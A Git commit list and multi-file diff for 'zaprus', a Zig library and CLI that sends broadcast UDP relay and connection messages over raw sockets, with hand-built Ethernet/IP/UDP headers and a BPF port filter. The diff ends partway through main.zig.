17 Commits

Author SHA1 Message Date
5b362590b7 fix use after free 2025-05-10 12:48:40 -04:00
c1b96370ba Attempt to base64 encode the connection payload
For some reason I am still getting this:

2025/05/10 16:37:06 Error decoding message: SGVsbG8gZGFya25lc3MgbXkgb2xkIGZyaWVuZA==::53475673624738675a4746796132356c63334d6762586b676232786b49475a79615756755a413d3daaaa
2025-05-10 12:37:39 -04:00
76d2c09c7d Use slice for init, and add better error sets.
The slice sets us avoid allocating within the init function.
This means init can't fail, and it also makes it easier to stack allocate messages (slice an array buffer, instead of creating a stack allocator).
2025-05-10 12:35:32 -04:00
9280fd095f 2025-04-30 17:00:12 -04:00
b575ad9094 2025-04-30 14:43:19 -04:00
73d0a80851 Remove bytesAsValueUnchecked
Callers can instead use std.mem.bytesAsValue directly.
2025-04-30 13:46:55 -04:00
fdd3f29fba Cleanup asBytes and test it 2025-04-30 13:46:55 -04:00
d0d0b83b57 Simplify init interface 2025-04-30 13:46:55 -04:00
bc3926bcca 2025-04-30 13:46:55 -04:00
6d4880fa6a Align the bytes instead of the struct 2025-04-30 13:46:54 -04:00
5e22c2b2ef 2025-04-30 13:46:54 -04:00
5530ed3d77 2025-04-30 13:46:54 -04:00
66ea478617 2025-04-30 13:46:54 -04:00
08954b9f3d 2025-04-30 13:46:54 -04:00
8d404a7c8d 2025-04-30 13:46:54 -04:00
18b04364df 2025-04-27 18:03:06 -04:00
cc8438448d Staring real connections 2025-04-27 18:03:06 -04:00
11 changed files with 475 additions and 1101 deletions

186
build.zig
View File

@@ -1,129 +1,72 @@
const std = @import("std");
// Although this function looks imperative, it does not perform the build
// directly and instead it mutates the build graph (`b`) that will be then
// executed by an external runner. The functions in `std.Build` implement a DSL
// for defining build steps and express dependencies between them, allowing the
// build runner to parallelize the build automatically (and the cache system to
// know when a step doesn't need to be re-run).
// Although this function looks imperative, note that its job is to
// declaratively construct a build graph that will be executed by an external
// runner.
pub fn build(b: *std.Build) void {
// Standard target options allow the person running `zig build` to choose
// Standard target options allows the person running `zig build` to choose
// what target to build for. Here we do not override the defaults, which
// means any target is allowed, and the default is native. Other options
// for restricting supported target set are available.
const target = b.standardTargetOptions(.{});
// Standard optimization options allow the person running `zig build` to select
// between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not
// set a preferred release mode, allowing the user to decide how to optimize.
const optimize = b.standardOptimizeOption(.{});
// It's also possible to define more custom flags to toggle optional features
// of this build script using `b.option()`. All defined flags (including
// target and optimize options) will be listed when running `zig build --help`
// in this directory.
// This creates a module, which represents a collection of source files alongside
// some compilation options, such as optimization mode and linked system libraries.
// Zig modules are the preferred way of making Zig code available to consumers.
// addModule defines a module that we intend to make available for importing
// to our consumers. We must give it a name because a Zig package can expose
// multiple modules and consumers will need to be able to specify which
// module they want to access.
const mod = b.addModule("zaprus", .{
// The root source file is the "entry point" of this module. Users of
// this module will only be able to access public declarations contained
// in this file, which means that if you have declarations that you
// intend to expose to consumers that were defined in other files part
// of this module, you will have to make sure to re-export them from
// the root file.
const lib_mod = b.createModule(.{
.root_source_file = b.path("src/root.zig"),
// Later on we'll use this module as the root module of a test executable
// which requires us to specify a target.
.target = target,
});
// Create static library
const lib = b.addLibrary(.{
.name = "zaprus",
.root_module = b.createModule(.{
.root_source_file = b.path("src/c_api.zig"),
.target = target,
.optimize = optimize,
.link_libc = true,
.imports = &.{
.{ .name = "zaprus", .module = mod },
},
}),
});
// We will also create a module for our other entry point, 'main.zig'.
const exe_mod = b.createModule(.{
// `root_source_file` is the Zig "entry point" of the module. If a module
// only contains e.g. external object files, you can make this `null`.
// In this case the main source file is merely a path, however, in more
// complicated build scripts, this could be a generated file.
.root_source_file = b.path("src/main.zig"),
.target = target,
.optimize = optimize,
});
lib_mod.addImport("network", b.dependency("network", .{}).module("network"));
lib_mod.addImport("gatorcat", b.dependency("gatorcat", .{}).module("gatorcat"));
exe_mod.addImport("zaprus", lib_mod);
exe_mod.addImport("clap", b.dependency("clap", .{}).module("clap"));
const lib = b.addLibrary(.{
.linkage = .static,
.name = "zaprus",
.root_module = lib_mod,
});
b.installArtifact(lib);
lib.installHeader(b.path("include/zaprus.h"), "zaprus.h");
// Here we define an executable. An executable needs to have a root module
// which needs to expose a `main` function. While we could add a main function
// to the module defined above, it's sometimes preferable to split business
// logic and the CLI into two separate modules.
//
// If your goal is to create a Zig library for others to use, consider if
// it might benefit from also exposing a CLI tool. A parser library for a
// data serialization format could also bundle a CLI syntax checker, for example.
//
// If instead your goal is to create an executable, consider if users might
// be interested in also being able to embed the core functionality of your
// program in their own executable in order to avoid the overhead involved in
// subprocessing your CLI tool.
//
// If neither case applies to you, feel free to delete the declaration you
// don't need and to put everything under a single module.
// This creates another `std.Build.Step.Compile`, but this one builds an executable
// rather than a static library.
const exe = b.addExecutable(.{
.name = "zaprus",
.root_module = b.createModule(.{
// b.createModule defines a new module just like b.addModule but,
// unlike b.addModule, it does not expose the module to consumers of
// this package, which is why in this case we don't have to give it a name.
.root_source_file = b.path("src/main.zig"),
// Target and optimization levels must be explicitly wired in when
// defining an executable or library (in the root module), and you
// can also hardcode a specific target for an executable or library
// definition if desireable (e.g. firmware for embedded devices).
.target = target,
.optimize = optimize,
// List of modules available for import in source files part of the
// root module.
.imports = &.{
// Here "zaprus" is the name you will use in your source code to
// import this module (e.g. `@import("zaprus")`). The name is
// repeated because you are allowed to rename your imports, which
// can be extremely useful in case of collisions (which can happen
// importing modules from different packages).
.{ .name = "zaprus", .module = mod },
},
}),
.root_module = exe_mod,
});
// This declares intent for the executable to be installed into the
// install prefix when running `zig build` (i.e. when executing the default
// step). By default the install prefix is `zig-out/` but can be overridden
// by passing `--prefix` or `-p`.
// standard location when the user invokes the "install" step (the default
// step when running `zig build`).
b.installArtifact(exe);
// This creates a top level step. Top level steps have a name and can be
// invoked by name when running `zig build` (e.g. `zig build run`).
// This will evaluate the `run` step rather than the default step.
// For a top level step to actually do something, it must depend on other
// steps (e.g. a Run step, as we will see in a moment).
const run_step = b.step("run", "Run the app");
// This creates a RunArtifact step in the build graph. A RunArtifact step
// invokes an executable compiled by Zig. Steps will only be executed by the
// runner if invoked directly by the user (in the case of top level steps)
// or if another step depends on it, so it's up to you to define when and
// how this Run step will be executed. In our case we want to run it when
// the user runs `zig build run`, so we create a dependency link.
// This *creates* a Run step in the build graph, to be executed when another
// step is evaluated that depends on it. The next line below will establish
// such a dependency.
const run_cmd = b.addRunArtifact(exe);
run_step.dependOn(&run_cmd.step);
// By making the run step depend on the default step, it will be run from the
// By making the run step depend on the install step, it will be run from the
// installation directory rather than directly from within the cache directory.
// This is not necessary, however, if the application depends on other installed
// files, this ensures they will be present and in the expected location.
run_cmd.step.dependOn(b.getInstallStep());
// This allows the user to pass arguments to the application in the build
@@ -132,42 +75,21 @@ pub fn build(b: *std.Build) void {
run_cmd.addArgs(args);
}
// Creates an executable that will run `test` blocks from the provided module.
// Here `mod` needs to define a target, which is why earlier we made sure to
// set the releative field.
const mod_tests = b.addTest(.{
.root_module = mod,
// This creates a build step. It will be visible in the `zig build --help` menu,
// and can be selected like this: `zig build run`
// This will evaluate the `run` step rather than the default, which is "install".
const run_step = b.step("run", "Run the app");
run_step.dependOn(&run_cmd.step);
const exe_unit_tests = b.addTest(.{
.root_module = exe_mod,
});
// A run step that will run the test executable.
const run_mod_tests = b.addRunArtifact(mod_tests);
const run_exe_unit_tests = b.addRunArtifact(exe_unit_tests);
// Creates an executable that will run `test` blocks from the executable's
// root module. Note that test executables only test one module at a time,
// hence why we have to create two separate ones.
const exe_tests = b.addTest(.{
.root_module = exe.root_module,
});
// A run step that will run the second test executable.
const run_exe_tests = b.addRunArtifact(exe_tests);
// A top level step for running all tests. dependOn can be called multiple
// times and since the two run steps do not depend on one another, this will
// make the two of them run in parallel.
const test_step = b.step("test", "Run tests");
test_step.dependOn(&run_mod_tests.step);
test_step.dependOn(&run_exe_tests.step);
// Just like flags, top level steps are also listed in the `--help` menu.
//
// The Zig build system is entirely implemented in userland, which means
// that it cannot hook into private compiler APIs. All compilation work
// orchestrated by the build system will result in other Zig compiler
// subcommands being invoked with the right flags defined. You can observe
// these invocations when one fails (or you pass a flag to increase
// verbosity) to validate assumptions and diagnose problems.
//
// Lastly, the Zig build system is relatively simple and self-contained,
// and reading its source code will allow you to master it.
// Similar to creating the run step earlier, this exposes a `test` step to
// the `zig build --help` menu, providing a way for the user to request
// running the unit tests.
const test_step = b.step("test", "Run unit tests");
test_step.dependOn(&run_exe_unit_tests.step);
}

View File

@@ -10,7 +10,7 @@
// This is a [Semantic Version](https://semver.org/).
// In a future version of Zig it will be used for package deduplication.
.version = "0.1.0",
.version = "0.0.0",
// Together with name, this represents a globally unique package
// identifier. This field is generated by the Zig toolchain when the
@@ -28,14 +28,27 @@
// Tracks the earliest Zig version that the package considers to be a
// supported use case.
.minimum_zig_version = "0.16.0",
.minimum_zig_version = "0.14.0",
// This field is optional.
// Each dependency must either provide a `url` and `hash`, or a `path`.
// `zig build --fetch` can be used to fetch all dependencies of a package, recursively.
// Once all dependencies are fetched, `zig build` no longer requires
// internet connectivity.
.dependencies = .{},
.dependencies = .{
.network = .{
.url = "https://github.com/ikskuh/zig-network/archive/c76240d2240711a3dcbf1c0fb461d5d1f18be79a.zip",
.hash = "network-0.1.0-AAAAAOwlAQAQ6zKPUrsibdpGisxld9ftUKGdMvcCSpaj",
},
.clap = .{
.url = "git+https://github.com/Hejsil/zig-clap?ref=0.10.0#e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a",
.hash = "clap-0.10.0-oBajB434AQBDh-Ei3YtoKIRxZacVPF1iSwp3IX_ZB8f0",
},
.gatorcat = .{
.url = "git+https://github.com/kj4tmp/gatorcat#bb1847f6c95852e7a0ec8c07870a948c171d5f98",
.hash = "gatorcat-0.3.2-WcrpTf1mBwDrmPaIhKCfLJO064v8Sjjn7DBq4CKZSgHH",
},
},
.paths = .{
"build.zig",
"build.zig.zon",

View File

@@ -1,33 +0,0 @@
#ifndef ZAPRUS_H
#define ZAPRUS_H
#include <stdint.h>
#include <stdlib.h>
typedef void* zaprus_client;
typedef void* zaprus_connection;
// Returns NULL if there was an error.
zaprus_client zaprus_init_client(void);
void zaprus_deinit_client(zaprus_client client);
// Returns 0 on success, else returns 1.
int zaprus_client_send_relay(zaprus_client client, const char* payload, size_t payload_len, const char dest[4]);
// Returns NULL if there was an error.
// Caller should call zaprus_deinit_connection when done with the connection.
zaprus_connection zaprus_connect(zaprus_client client, const char* payload, size_t payload_len);
void zaprus_deinit_connection(zaprus_connection connection);
// Capacity is the maximum length of the output buffer.
// out_len is modified to specify how much of the capacity is used by the response.
// Blocks until the next message is available, or returns 1 if the underlying socket times out.
// Returns 0 on success, else returns 1.
int zaprus_connection_next(zaprus_connection connection, char *out, size_t capacity, size_t *out_len);
// Returns 0 on success, else returns 1.
int zaprus_connection_send(zaprus_connection connection, const char *payload, size_t payload_len);
#endif // ZAPRUS_H

View File

@@ -1,146 +1,152 @@
const base64_enc = std.base64.standard.Encoder;
const base64_dec = std.base64.standard.Decoder;
const base64Enc = std.base64.Base64Encoder.init(std.base64.standard_alphabet_chars, '=');
const base64Dec = std.base64.Base64Decoder.init(std.base64.standard_alphabet_chars, '=');
const Client = @This();
var rand: ?Random = null;
const max_message_size = 2048;
pub const max_payload_len = RawSocket.max_payload_len;
socket: RawSocket,
pub fn init() !Client {
const socket: RawSocket = try .init();
return .{
.socket = socket,
};
pub fn init() !void {
var prng = Random.DefaultPrng.init(blk: {
var seed: u64 = undefined;
try posix.getrandom(mem.asBytes(&seed));
break :blk seed;
});
rand = prng.random();
try network.init();
}
pub fn deinit(self: *Client) void {
self.socket.deinit();
self.* = undefined;
pub fn deinit() void {
network.deinit();
}
pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
fn broadcastSaprusMessage(msg: *SaprusMessage, udp_port: u16) !void {
if (false) {
var foo: gcat.nic.RawSocket = try .init("enp7s0"); // /proc/net/dev
defer foo.deinit();
}
const msg_bytes = msg.asBytes();
try msg.networkFromNativeEndian();
defer msg.nativeFromNetworkEndian() catch unreachable;
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
try sock.setBroadcast(true);
// Bind to 0.0.0.0:0
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.any },
.port = 0,
};
const relay: SaprusMessage = .{
.relay = .{
.dest = .fromBytes(&dest),
.payload = payload,
},
const dest_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = udp_port,
};
var relay_buf: [max_message_size - (@bitSizeOf(EthIpUdp) / 8)]u8 = undefined;
const relay_bytes = relay.toBytes(&relay_buf);
headers.setPayloadLen(relay_bytes.len);
try sock.bind(bind_addr);
var msg_buf: [max_message_size]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(relay_bytes) catch unreachable;
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
_ = try sock.sendTo(dest_addr, msg_bytes);
}
pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
pub fn sendRelay(payload: []const u8, dest: [4]u8, allocator: Allocator) !void {
const msg_bytes = try allocator.alignedAlloc(
u8,
@alignOf(SaprusMessage),
try SaprusMessage.lengthForPayloadLength(
.relay,
base64Enc.calcSize(payload.len),
),
);
defer allocator.free(msg_bytes);
const msg: *SaprusMessage = .init(.relay, msg_bytes);
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
};
const relay = (try msg.getSaprusTypePayload()).relay;
relay.dest = dest;
_ = base64Enc.encode(relay.getPayload(), payload);
// udp dest port should not be 8888 after first
const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16));
var connection: SaprusMessage = .{
.connection = .{
.src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.seq = undefined,
.id = undefined,
.payload = payload,
},
};
log.debug("Setting bpf filter to port {}", .{connection.connection.src});
self.socket.attachSaprusPortFilter(connection.connection.src) catch |err| {
log.err("Failed to set port filter: {t}", .{err});
return err;
};
log.debug("bpf set", .{});
var connection_buf: [2048]u8 = undefined;
var connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len);
log.debug("Building full message", .{});
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
var full_msg = msg_w.buffered();
log.debug("Built full message. Sending message", .{});
try self.socket.send(full_msg);
var res_buf: [4096]u8 = undefined;
log.debug("Awaiting handshake response", .{});
// Ignore response from sentinel, just accept that we got one.
_ = try self.socket.receive(&res_buf);
headers.udp.dst_port = udp_dest_port;
headers.ip.id = rand.int(u16);
headers.setPayloadLen(connection_bytes.len);
log.debug("Building final handshake message", .{});
msg_w.end = 0;
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
full_msg = msg_w.buffered();
try self.socket.send(full_msg);
return .init(self.socket, headers, connection);
try broadcastSaprusMessage(msg, 8888);
}
const RawSocket = @import("./RawSocket.zig");
fn randomPort() u16 {
var p: u16 = 0;
if (rand) |r| {
p = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
return p;
}
pub fn sendInitialConnection(payload: []const u8, initial_port: u16, allocator: Allocator) !*SaprusMessage {
const dest_port = randomPort();
const msg_bytes = try allocator.alignedAlloc(
u8,
@alignOf(SaprusMessage),
try SaprusMessage.lengthForPayloadLength(
.connection,
base64Enc.calcSize(payload.len),
),
);
const msg: *SaprusMessage = .init(.connection, msg_bytes);
const connection = (try msg.getSaprusTypePayload()).connection;
connection.src_port = initial_port;
connection.dest_port = dest_port;
_ = base64Enc.encode(connection.getPayload(), payload);
try broadcastSaprusMessage(msg, 8888);
return msg;
}
pub fn connect(payload: []const u8, allocator: Allocator) !?SaprusConnection {
var initial_port: u16 = 0;
if (rand) |r| {
initial_port = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
var initial_conn_res: ?*SaprusMessage = null;
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
// Bind to 255.255.255.255:8888
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = 8888,
};
// timeout 1s
try sock.setReadTimeout(1 * std.time.us_per_s);
try sock.bind(bind_addr);
const msg = try sendInitialConnection(payload, initial_port, allocator);
defer allocator.free(msg.asBytes());
var response_buf: [4096]u8 align(@alignOf(SaprusMessage)) = undefined;
_ = try sock.receive(&response_buf); // Ignore message that I sent.
const len = try sock.receive(&response_buf);
std.debug.print("response bytes: {x}\n", .{response_buf[0..len]});
initial_conn_res = SaprusMessage.init(.connection, response_buf[0..len]);
// Complete handshake after awaiting response
try broadcastSaprusMessage(msg, randomPort());
if (false) {
return initial_conn_res.?;
}
return null;
}
const SaprusMessage = @import("message.zig").Message;
const SaprusConnection = @import("Connection.zig");
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const std = @import("std");
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;
const Random = std.Random;
const posix = std.posix;
const mem = std.mem;
const network = @import("network");
const gcat = @import("gatorcat");
const Allocator = mem.Allocator;

View File

@@ -1,61 +0,0 @@
socket: RawSocket,
headers: EthIpUdp,
connection: SaprusMessage,
const Connection = @This();
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
return .{
.socket = socket,
.headers = headers,
.connection = connection,
};
}
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
_ = io;
log.debug("Awaiting connection message", .{});
const res = try self.socket.receive(buf);
log.debug("Received {} byte connection message", .{res.len});
const msg: SaprusMessage = try .parse(res[42..]);
const connection_res = msg.connection;
log.debug("Payload was {s}", .{connection_res.payload});
return connection_res.payload;
}
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
log.debug("Sending connection message", .{});
self.connection.connection.payload = buf;
var connection_bytes_buf: [2048]u8 = undefined;
const connection_bytes = self.connection.toBytes(&connection_bytes_buf);
self.headers.ip.id = rand.int(u16);
self.headers.setPayloadLen(connection_bytes.len);
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
try msg_w.writeAll(&self.headers.toBytes());
try msg_w.writeAll(connection_bytes);
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
log.debug("Sent {} byte connection message", .{full_msg.len});
}
const std = @import("std");
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;
const SaprusMessage = @import("./message.zig").Message;
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const RawSocket = @import("./RawSocket.zig");

View File

@@ -1,93 +0,0 @@
pub const EthIpUdp = packed struct(u336) { // 42 bytes * 8 bits = 336
// --- UDP (Last in memory, defined first for LSB->MSB) ---
udp: packed struct {
checksum: u16 = 0,
len: u16,
dst_port: u16,
src_port: u16,
},
// --- IP ---
ip: packed struct {
dst_addr: u32,
src_addr: u32,
header_checksum: u16 = 0,
protocol: u8 = 17, // udp
ttl: u8 = 0x40,
// fragment_offset (13 bits) + flags (3 bits) = 16 bits
// In Big Endian, flags are the high bits of the first byte.
// To have flags appear first in the stream, define them last here.
fragment_offset: u13 = 0,
flags: packed struct(u3) {
reserved: u1 = 0,
dont_fragment: u1 = 1,
more_fragments: u1 = 0,
} = .{},
id: u16,
len: u16,
tos: u8 = undefined,
// ip_version (4 bits) + ihl (4 bits) = 8 bits
// To have version appear first (high nibble), define it last.
ihl: u4 = 5,
ip_version: u4 = 4,
},
// --- Ethernet ---
eth_type: u16 = std.os.linux.ETH.P.IP,
src_mac: @Vector(6, u8),
dst_mac: @Vector(6, u8) = @splat(0xff),
pub fn toBytes(self: @This()) [336 / 8]u8 {
var res: [336 / 8]u8 = undefined;
var w: Writer = .fixed(&res);
w.writeStruct(self, .big) catch unreachable;
return res;
}
pub fn setPayloadLen(self: *@This(), len: usize) void {
self.ip.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8) + (@bitSizeOf(@TypeOf(self.ip)) / 8));
// Zero the checksum field before calculation
self.ip.header_checksum = 0;
// Serialize IP header to big-endian bytes
var ip_bytes: [@bitSizeOf(@TypeOf(self.ip)) / 8]u8 = undefined;
var w: Writer = .fixed(&ip_bytes);
w.writeStruct(self.ip, .big) catch unreachable;
// Calculate checksum over serialized bytes
self.ip.header_checksum = onesComplement16(&ip_bytes);
self.udp.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8));
}
};
fn onesComplement16(data: []const u8) u16 {
var sum: u32 = 0;
// Process pairs of bytes as 16-bit words
var i: usize = 0;
while (i + 1 < data.len) : (i += 2) {
const word: u16 = (@as(u16, data[i]) << 8) | data[i + 1];
sum += word;
}
// Handle odd byte if present
if (data.len % 2 == 1) {
sum += @as(u32, data[data.len - 1]) << 8;
}
// Fold 32-bit sum to 16 bits
while (sum >> 16 != 0) {
sum = (sum & 0xFFFF) + (sum >> 16);
}
// Return ones' complement
return ~@as(u16, @truncate(sum));
}
const std = @import("std");
const Writer = std.Io.Writer;

View File

@@ -1,167 +0,0 @@
const RawSocket = @This();
const is_debug = builtin.mode == .Debug;
fd: i32,
sockaddr_ll: std.posix.sockaddr.ll,
mac: [6]u8,
pub const max_payload_len = 1000;
const Ifconf = extern struct {
ifc_len: i32,
ifc_ifcu: extern union {
ifcu_buf: ?[*]u8,
ifcu_req: ?[*]std.os.linux.ifreq,
},
};
pub fn init() !RawSocket {
const socket: i32 = std.math.cast(i32, std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0)) orelse return error.SocketError;
if (socket < 0) return error.SocketError;
var ifreq_storage: [16]std.os.linux.ifreq = undefined;
var ifc = Ifconf{
.ifc_len = @sizeOf(@TypeOf(ifreq_storage)),
.ifc_ifcu = .{ .ifcu_req = &ifreq_storage },
};
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFCONF, @intFromPtr(&ifc)) != 0) {
return error.NicError;
}
const count = @divExact(ifc.ifc_len, @sizeOf(std.os.linux.ifreq));
// Get the first non loopback interface
var ifr = for (ifreq_storage[0..@intCast(count)]) |*ifr| {
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) == 0) {
if (ifr.ifru.flags.LOOPBACK) continue;
break ifr;
}
} else return error.NoInterfaceFound;
// 2. Get Interface Index
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFINDEX, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const ifindex: i32 = ifr.ifru.ivalue;
// 3. Get Real MAC Address
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFHWADDR, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
var mac: [6]u8 = ifr.ifru.hwaddr.data[0..6].*;
if (builtin.cpu.arch.endian() == .little) std.mem.reverse(u8, &mac);
// 4. Set Flags (Promiscuous/Broadcast)
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
ifr.ifru.flags.BROADCAST = true;
ifr.ifru.flags.PROMISC = true;
if (std.os.linux.ioctl(socket, std.os.linux.SIOCSIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const sockaddr_ll = std.mem.zeroInit(std.posix.sockaddr.ll, .{
.family = std.posix.AF.PACKET,
.ifindex = ifindex,
.protocol = std.mem.nativeToBig(u16, @as(u16, std.os.linux.ETH.P.IP)),
});
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError;
return .{
.fd = socket,
.sockaddr_ll = sockaddr_ll,
.mac = mac,
};
}
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
if (timeout_ret != 0) return error.SetTimeoutError;
}
pub fn deinit(self: *RawSocket) void {
_ = std.os.linux.close(self.fd);
self.* = undefined;
}
pub fn send(self: RawSocket, payload: []const u8) !void {
const sent_bytes = std.os.linux.sendto(
self.fd,
payload.ptr,
payload.len,
0,
@ptrCast(&self.sockaddr_ll),
@sizeOf(@TypeOf(self.sockaddr_ll)),
);
_ = sent_bytes;
}
pub fn receive(self: RawSocket, buf: []u8) ![]u8 {
const len = std.os.linux.recvfrom(
self.fd,
buf.ptr,
buf.len,
0,
null,
null,
);
if (std.os.linux.errno(len) != .SUCCESS) {
return error.Timeout; // TODO: get the real error, assume timeout for now.
}
return buf[0..len];
}
pub fn attachSaprusPortFilter(self: RawSocket, port: u16) !void {
const BPF = std.os.linux.BPF;
// BPF instruction structure for classic BPF
const SockFilter = extern struct {
code: u16,
jt: u8,
jf: u8,
k: u32,
};
const SockFprog = extern struct {
len: u16,
filter: [*]const SockFilter,
};
// Build the filter program
const filter = [_]SockFilter{
// Load 2 bytes at offset 46 (absolute)
.{ .code = BPF.LD | BPF.H | BPF.ABS, .jt = 0, .jf = 0, .k = 46 },
// Jump if equal to port (skip 0 if true, skip 1 if false)
.{ .code = BPF.JMP | BPF.JEQ | BPF.K, .jt = 0, .jf = 1, .k = @as(u32, port) },
// Return 0xffff (pass)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0xffff },
// Return 0x0 (fail)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0x0 },
};
const fprog = SockFprog{
.len = filter.len,
.filter = &filter,
};
// Attach filter to socket using setsockopt
const rc = std.os.linux.setsockopt(
self.fd,
std.os.linux.SOL.SOCKET,
std.os.linux.SO.ATTACH_FILTER,
@ptrCast(&fprog),
@sizeOf(SockFprog),
);
if (rc != 0) {
return error.BpfAttachFailed;
}
}
const std = @import("std");
const builtin = @import("builtin");

View File

@@ -1,88 +0,0 @@
const std = @import("std");
const zaprus = @import("zaprus");
// Opaque types for C API
const ZaprusClient = opaque {};
const ZaprusConnection = opaque {};
const alloc = std.heap.c_allocator;
const io = std.Io.Threaded.global_single_threaded.io();
export fn zaprus_init_client() ?*ZaprusClient {
const client = alloc.create(zaprus.Client) catch return null;
client.* = zaprus.Client.init() catch {
alloc.destroy(client);
return null;
};
return @ptrCast(client);
}
export fn zaprus_deinit_client(client: ?*ZaprusClient) void {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
if (c) |zc| {
zc.deinit();
alloc.destroy(zc);
}
}
export fn zaprus_client_send_relay(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
dest: [*c]const u8,
) c_int {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return 1;
zc.sendRelay(io, payload[0..payload_len], dest[0..4].*) catch return 1;
return 0;
}
export fn zaprus_connect(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
) ?*ZaprusConnection {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return null;
const connection = alloc.create(zaprus.Connection) catch return null;
connection.* = zc.connect(io, payload[0..payload_len]) catch {
alloc.destroy(connection);
return null;
};
return @ptrCast(connection);
}
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
if (c) |zc| {
alloc.destroy(zc);
}
}
export fn zaprus_connection_next(
connection: ?*ZaprusConnection,
out: [*c]u8,
capacity: usize,
out_len: *usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
const result = zc.next(io, out[0..capacity]) catch return 1;
out_len.* = result.len;
return 0;
}
export fn zaprus_connection_send(
connection: ?*ZaprusConnection,
payload: [*c]const u8,
payload_len: usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
zc.send(io, payload[0..payload_len]) catch return 1;
return 0;
}

View File

@@ -1,230 +1,72 @@
const is_debug = builtin.mode == .Debug;
const help =
/// This creates a debug allocator that can only be referenced in debug mode.
/// You should check for is_debug around every reference to dba.
var dba: DebugAllocator =
if (is_debug)
DebugAllocator.init
else
@compileError("Should not use debug allocator in release mode");
pub fn main() !void {
defer if (is_debug) {
_ = dba.deinit();
};
const gpa = if (is_debug) dba.allocator() else std.heap.smp_allocator;
// CLI parsing adapted from the example here
// https://github.com/Hejsil/zig-clap/blob/e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a/README.md#examples
// First we specify what parameters our program can take.
